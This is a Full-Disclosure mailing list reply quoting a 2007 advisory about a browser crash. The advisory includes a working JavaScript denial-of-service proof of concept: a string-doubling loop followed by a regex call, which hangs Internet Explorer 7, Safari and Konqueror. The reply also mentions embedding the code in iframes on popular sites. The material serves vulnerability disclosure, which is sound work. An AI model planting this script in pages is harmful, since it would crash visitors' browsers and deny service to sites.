Re: [Full-disclosure] Internet Explorer Crash



This also works under Konqueror.

There should be an implimentation on ALL browsers that a loop such large is
unacceptable and refuse to even run it. There is no viable reason for a
client-side to run a loop through so many itterations.

This DoS technique could be abused and iframes with the code could be
embedded within popular websites, effectively causing a denial of service to
that specific site.


On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <=
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999) z+=z; var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: Awesome Tutorials for JavaScript beginners
    ... If the statement is false we exit from the while loop. ... Most Web developers think browser scripting is ... var UA = navigator.userAgent.toLowerCase; ... I suppose they could contact the authors of the script ...
    (comp.lang.javascript)
  • Re: Internet Explorer Crash
    ... IE 7 is vulnerable to a script which causes the browser to hang. ... Safari and Konqueror to crash. ... Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org ...
    (Bugtraq)
  • Re: Microsoft closes another deal, is redhat next?
    ... The thing that is really embarrassing about the above error message, ... In my case Konqueror is set to identify ... So obviously what's going on here is the script is looking for the word ... I assume the script then acts as if the browser HAS to be ...
    (Fedora)
  • Re: Another bizzare PerlScript/WSH problem
    ... waiting for the script to finish before closing the output. ... Well, humbly speaking, I expected the script to loop and fill the browser ... I've written a few utilities basically using this loop, ...
    (comp.lang.perl.misc)
  • Re: CGI script parameter error.
    ... with Safari 5.0.2 and Konqueror 4.4.4 it does not. ... Here is the url of the script itself: ... work directly as the target for a web browser. ...
    (alt.html)